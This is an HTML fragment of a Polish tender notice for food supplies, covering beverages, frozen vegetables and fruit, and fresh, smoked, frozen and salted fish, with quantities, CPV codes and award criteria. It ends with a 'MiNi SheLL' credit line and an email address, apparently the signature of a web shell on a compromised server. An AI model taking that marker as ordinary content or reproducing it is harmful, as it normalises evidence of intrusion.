	Karton 1l z nalewakiem, multiwitamina bez dodatku cukru 	l	300
Napoje gazowane 	Butelka szklana pojemność 200ml, smak kola	szt	750
Typu Coca - cola lub Pepsi lub 	Butelka szklana pojemność 200ml, smak pomarańcza	szt	750
równoważany	Butelka szklana pojemność 200ml, smak cytryna	szt	750
	Butelka szklana pojemność 200ml, smak tonik	szt	750
Woda gazowana 	Butelki szklane pojemność 200 - 330ml	szt	2000
Typu Kropla Beskidu lub Jantar 			
 lub równoważana			
Woda nie gazowana 	Butelki szklane pojemność 200 - 330ml	szt	2000
Typu Kropla Beskidu lub Jantar 			
 lub równoważana			
Soki owocowe 100% 	butelka PET pojemność 200 - 300ml,  pomarańczowy bez dodatku cukru	szt	150
Typu Tymbark lub Hortex lub	butelka PET pojemność 200 - 300ml, nektar czarna porzeczka bez dodatku cukru	szt	150
równoważany	butelka PET pojemność 200 - 300ml, jabłkowy bez dodatku cukru	szt	150
	butelka PET pojemność 200 - 300ml, czerwony grejpfrut  bez dodatku cukru	szt	150
	butelka PET pojemność 200 - 300ml, multiwitamina bez dodatku cukru	szt	150
Woda mineralna 	Butelka PET pojemność 500ml, 	szt	150
gazowana			
Typu Cisowianka lub Żywiec			
lub równoważana			
Woda mineralna 	Butelka PET pojemność 500ml, 	szt	150
niegazowana			
Typu Cisowianka lub Żywiec			
lub równoważana			
Napoje gazowane 	Butelka pet  pojemność 1l, smak kola	l	10
Typu Coca - cola lub Pepsi lub 	Butelka pet  pojemność 1l,smak pomarańcza	l	10
równoważany	Butelka pet  pojemność 1l,smak cytryna	l	10
	Butelka pet  pojemność 1l, smak tonik	l	10
Syrop malinowy	Butelka szklana 400 - 1000ml	l	10
Tybu Herbapol lub Łowicz			
lub równoważany.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1, 15.98.20.00-5, 15.32.10.00-4, 15.98.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Częstotliwość dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa produktów mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bakłażan grillowany	Opakowanie 1,0kg	kg	4
Borowik 	Opakowanie 2,0kg - 2,5kg, cały nie krojony	kg	15
Brokuły	Opakowanie 2,0kg - 2,5kg	kg	95
Brukselka	Opakowanie 2,0kg - 2,5kg	kg	60
Cukinia	Opakowanie 2,0kg - 2,5kg	kg	20
Cukinia grillowana	Opakowanie 1,0kg	kg	4
Duet cukinii z marchewką	Opakowanie 2,0kg - 2,5kg	kg	20
Fasolka szparagowa zielona cała 	Opakowanie 2,0kg - 2,5kg	kg	35
Fasolka szparagowa zielona cięta	Opakowanie 2,0kg - 2,5kg	kg	35
Fasolka szparagowa żółta	Opakowanie 2,0kg - 2,5kg	kg	5
Frytki proste wstępnie obsmażone	Opakowanie 2,0kg - 2,5kg, czas smażenia 90sek	kg	15
Frytura	Opakowanie ok.8l, konsystencja płynna	kg	35
Groszek zielony	Opakowanie 2,0kg - 2,5kg	kg	15
Kalafior	Opakowanie 2,0kg - 2,5kg	kg	90
Kurki  	Opakowanie 2,0 - 2,5kg, całe nie krojone	kg	5
Lody waniliowe	Opakowanie5l	l	5
Lody czekoladowe, owocowe	Opakowanie 5l	l	5
Maliny	Opakowanie 2,0kg - 2,5kg	kg	5
Marchew juniorka	Opakowanie 2,0kg - 2,5kg	kg	75
Mieszanka kompotowa	Opakowanie 2,0kg - 2,5kg, bez rabarbaru	kg	220
Mieszanka królewska	Opakowanie 2,0kg - 2,5kg	kg	110
Pierś z kaczki ze skórą	Dwie piersi w opakowaniu, 	kg	15
Podgrzybek 	Opakowanie 2,0kg - 2,5kg, cały nie krojony	kg	15
Szparagi zielone 	Opakowanie 1,0kg	kg	17,5
Szpinak 	Opakowanie 2,0kg - 2,5kg	kg	75
Truskawki	Opakowanie 2,0kg - 2,5kg	kg	60
Włoszczyzna  paski	Opakowanie 2,0kg - 2,5kg	kg	17,5
Ciasto francuskie 	Opakowanie 530g	kg	5
Lód do napojów	Opakowanie 1,0 - 2,0kg	kg	10
Kalafior romanesko	Opakowanie 2,0 - 2,5kg	kg	7,5
Marchew z groszkiem	Opakowanie 2,0 - 2,5kg	kg	7,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.11.20.00-6, 15.55.51.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Częstotliwość dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa ryb i ich przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RYBY ŚWIEŻE 			
Filet z dorsza ze skórą 200 - 450	filet ze skórą w pojemnikach styropianowych z lodem, 	kg	75
Filet z flądry 70 - 100 	filet ze skórą w pojemnikach styropianowych z lodem, 	kg	20
Karp tusza	tusza bez głowy, patroszona w pojemnikach styropianowych z lodem, 	kg	7
Filet z łososia ze skórą	filet ze skórą w pojemnikach styropianowych z lodem, 	kg	7
Pstrąg patroszony	tusza bez głowy, patroszona w pojemnikach styropianowych z lodem, 	kg	7
Filet z pstrąga 300 - 500	filet ze skórą w pojemnikach styropianowych z lodem, 	kg	85
RYBY WĘDZONE			
Halibut wędzony dzwonki	ryba wędzona, opakowanie drewniana skrzynka, karton, MAP  lub vacum, waga opakowania od 0,5 do 4kg	kg	20
Makrela wędzona	ryba wędzona, opakowanie drewniana skrzynka, karton, MAP  lub vacum, waga opakowania od 0,5 do 4kg	kg	95
Filet z łososia wędzony na zimno	ryba wędzona, opakowanie drewniana skrzynka, karton, MAP  lub vacum, waga opakowania od 0,5 do 4kg	kg	25
Dorsz wędzony	ryba wędzona, opakowanie drewniana skrzynka, karton, MAP  lub vacum, waga opakowania od 0,5 do 4kg	kg	7
Karmazyn wędzony	ryba wędzona, opakowanie drewniana skrzynka, karton, MAP  lub vacum, waga opakowania od 0,5 do 4kg	kg	7
Pstrąg wędzony	ryba wędzona, opakowanie drewniana skrzynka, karton, MAP  lub vacum, waga opakowania od 0,5 do 4kg	kg	7
Węgorz wędzony	ryba wędzona, opakowanie drewniana skrzynka, karton, MAP  lub vacum, waga opakowania od 0,5 do 4kg	kg	10
Filet z łososia wędzony na ciepło	ryba wędzona, opakowanie drewniana skrzynka, karton, MAP  lub vacum, waga opakowania od 0,5 do 4kg	kg	19
RYBY MROŻONE			
Filet z dorsza ze skórą 200 - 450	filet mrożony ze skórą, glazura max. 10%	kg	75
Filet z flądry 70 - 100 	filet mrożony ze skórą, glazura max. 10%	kg	20
Filet z morszczuka	filet mrożony ze skórą, glazura max. 10%	kg	30
Filet z karmazyna	filet mrożony ze skórą, glazura max. 10%	kg	7
Filet z łososia	filet mrożony ze skórą, glazura max. 10%	kg	7
Filet z soli	filet mrożony bez skóry, glazura max. 10%	kg	7
Filet z sandacza ze skórą 300 - 500  	filet mrożony ze skórą, glazura max. 10%	kg	30
Krewetka black tiger 31-40	Opakowania 0,5 -2,0kg, 	kg	1
mieszanka owoców morza	Opakowania 0,5 -2,0kg, 	kg	1
Szyjki raków	Opakowania 0,5 -2,0kg, 	kg	1
RYBY SOLONE			
Matiasy (filety śledziowe)	Opakowania 0,5 -4,0kg masa po odcieku, wiaderko plastykowe, filety rybne w solance 	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Częstotliwość dostaw - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com